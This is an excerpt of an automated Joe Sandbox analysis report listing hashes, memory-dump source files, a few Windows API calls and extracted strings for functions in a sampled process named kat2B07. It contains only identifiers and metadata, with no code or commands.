                                                                • Opcode Fuzzy Hash: 178d87df47086a60de30caf649a3059a3b0dcb840f5e7811d78661b9ffd68d0f
                                                                • Instruction Fuzzy Hash: 25F17F729083519FC704CF24E884B2AB7F4FF85268F054A6EF98997211E731E945CB9B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e18a6df0483f4b84902323d2fd2fb775b135b6bc184b63aa65cb73ecf165a79c
                                                                • Instruction ID: b6e69ae18ed1d9aeeef32389a9b973d398e341cf18d965b7bb801f0e39405d9e
                                                                • Opcode Fuzzy Hash: e18a6df0483f4b84902323d2fd2fb775b135b6bc184b63aa65cb73ecf165a79c
                                                                • Instruction Fuzzy Hash: BDB1BFB4908742AFD701CF25C884B1BB7F8BF89328F108A1AF95897251E7B5E454DF92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                • Instruction ID: 42a74ca81b2701f57b33ee0b86785dde45c8fdc92c3cc9987347bd62e94810a7
                                                                • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                • Instruction Fuzzy Hash: 7E4135752043429FDB16DF14D884A76B3E0FF48221F21846AE94587A61E721F840CB12
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6126d287ad3514f0d5b7f3f1bed8fbcd58c294c76b130dcb0bee5cf8b4261052
                                                                • Instruction ID: 60dda0602bc69266270aebb5c8d47ee1f9fee358dc39a291e35d9dfe9e8a933e
                                                                • Opcode Fuzzy Hash: 6126d287ad3514f0d5b7f3f1bed8fbcd58c294c76b130dcb0bee5cf8b4261052
                                                                • Instruction Fuzzy Hash: 6B31E475600202DFD390CF18E885E66B3F5FF84336B1545BAE9468B262D722FC51CB52
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a09362fc771823978f9a7b77dd4ed51c62033f3e81323fe8031a27e25c93890d
                                                                • Instruction ID: 18ce6a4285f0a206809184f599f776f75e8d35c56b8e39b13ac0ee502cb30f80
                                                                • Opcode Fuzzy Hash: a09362fc771823978f9a7b77dd4ed51c62033f3e81323fe8031a27e25c93890d
                                                                • Instruction Fuzzy Hash: 8E1124B720A3097BE3045A64BC81FEBB3ACDF48336F11052AFB4552151EB76B91183A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: VUUU
                                                                • API String ID: 0-2040033107
                                                                • Opcode ID: db9ce26b11e4061b2a705002131f793724b36a0254c4c524ef95aed6d66bb0e5
                                                                • Instruction ID: f88ce9218d26935741bbe7723155889c68b306a947868f2c9e7010eea37fffa2
                                                                • Opcode Fuzzy Hash: db9ce26b11e4061b2a705002131f793724b36a0254c4c524ef95aed6d66bb0e5
                                                                • Instruction Fuzzy Hash: 0B81F6B19083559FC715DF29C884A3BFBE4FF89220F05466EE989C7252E770E944CB92
                                                                Strings
                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1D7B2001
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                • API String ID: 0-914542581
                                                                • Opcode ID: 316482842e2c3fb1cb6004c354bb9083d7cee8890a57985583e919ea1e26ae9a
                                                                • Instruction ID: c390f0cb9f0a90a87285cb1a1b7feefef39acca357121b8b1441d702a308999f
                                                                • Opcode Fuzzy Hash: 316482842e2c3fb1cb6004c354bb9083d7cee8890a57985583e919ea1e26ae9a
                                                                • Instruction Fuzzy Hash: E021DD75504205BFDB11AF68EC84F66B7AAEF04364F410419F988A7232D372F860CBA7
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d841588aaed7c9318ad90bac4da0a506aac3084825efbd8e160ed3eb6dcd40c
                                                                • Instruction ID: 7630adbe8d7bee60d39ee7555836b950038d0f57b8eeb9259cd205322c61ddfa
                                                                • Opcode Fuzzy Hash: 3d841588aaed7c9318ad90bac4da0a506aac3084825efbd8e160ed3eb6dcd40c
                                                                • Instruction Fuzzy Hash: 996124F41483829FC720CF55C480A5BBBE1BB86350F958A2EE59A6F310D732A409CF93
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3966a2d936edd45f59b6e0deb058351046a11c26772725d757917f5ea545eae4
                                                                • Instruction ID: 43c83a04953fe5e07406c3cf022ad7ccc70fa4c392eb5c62f261809221ad4ba4
                                                                • Opcode Fuzzy Hash: 3966a2d936edd45f59b6e0deb058351046a11c26772725d757917f5ea545eae4
                                                                • Instruction Fuzzy Hash: 6E01D1B9604311BBCB115F18FD05BAA77A5AFC4726F16046DFA0067222D336F828C7A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtreeMatchArg
                                                                • API String ID: 0-1459067757
                                                                • Opcode ID: 146b8a641683908b183f16e9c703e9cbe0b327827741d9ac7463d3d8f60661dc
                                                                • Instruction ID: bd3cb6c88c7cadf863e692cc343f05721e832f97eaec4501d8ce8720b0b883a6
                                                                • Opcode Fuzzy Hash: 146b8a641683908b183f16e9c703e9cbe0b327827741d9ac7463d3d8f60661dc
                                                                • Instruction Fuzzy Hash: 0102DEB49087428FD711CF24D8C4A2ABBF5BF49364F01465EED899B221E735E944CBA3
                                                                APIs
                                                                • GetACP.KERNEL32 ref: 1D922A1F
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 1D922A56
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 1D922C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: CodeInfoLocalePageValid
                                                                • String ID: utf8
                                                                • API String ID: 790303815-905460609
                                                                • Opcode ID: 324cc0f50e6ffc9dd28e0a012d8201eb5067cd5963563ae4d8c82f4d8c045c0e
                                                                • Instruction ID: f6fd4ec213eda5bc3452c061593b39a208fc9c3122463ddc65054afa1b1a8121
                                                                • Opcode Fuzzy Hash: 324cc0f50e6ffc9dd28e0a012d8201eb5067cd5963563ae4d8c82f4d8c045c0e
                                                                • Instruction Fuzzy Hash: B871F375604206AADB279F74CCC5BBA73ACEF05710F9240ADEA09DB194EB74E540C7A3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c4fd3eada0e727518cb8d937ed3d72a08de97ad56f4981d5bf272560bf003879
                                                                • Instruction ID: d61c034a4d4ff229405cbef202209e20c864b1ba36f19fdb357dd071948d9ee5
                                                                • Opcode Fuzzy Hash: c4fd3eada0e727518cb8d937ed3d72a08de97ad56f4981d5bf272560bf003879
                                                                • Instruction Fuzzy Hash: CE311672504200AFD718CF09EC40A77B7E5EF85335F05899AF8458F252D736E896C792
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1D8D48A7
                                                                • IsDebuggerPresent.KERNEL32 ref: 1D8D4973
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 1D8D4993
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 1D8D499D
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: de832374d6baf88145f6d344987dc1015f30f9392ceee4c1de0c0bf9e5a85a80
                                                                • Instruction ID: 113348346a3dfb2db499e83d193576f30d04c413812ff47b4305049d4b003fee
                                                                • Opcode Fuzzy Hash: de832374d6baf88145f6d344987dc1015f30f9392ceee4c1de0c0bf9e5a85a80
                                                                • Instruction Fuzzy Hash: 18311875D0531CABDB11DFA4D9897CDBBB8BF08304F1041AAE50DAB290EB759A858F05
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                • Instruction ID: 99798a4f724f13a7fea32090c1cebfcca4c773dfce2bc49da573807cc0dafb76
                                                                • Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                • Instruction Fuzzy Hash: 711108319085627BD3528B29E844B56F7A1BF44334F064A66FC499BA62D322F860C7D3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                • Instruction ID: d58aca86222f33ccc6c1fd31bbe89473c598c340e2fbb628e23b3727e4dd9330
                                                                • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                • Instruction Fuzzy Hash: D5E0BF35008710BFCB125F54ED4AE4BBFB6BF48721F060D19F6C521571C772A860AB42
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                • Instruction ID: b5aa2980edece9b1fb7720561d82e5bcc59c7bc0158793a5b8055cf9938cf0fb
                                                                • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
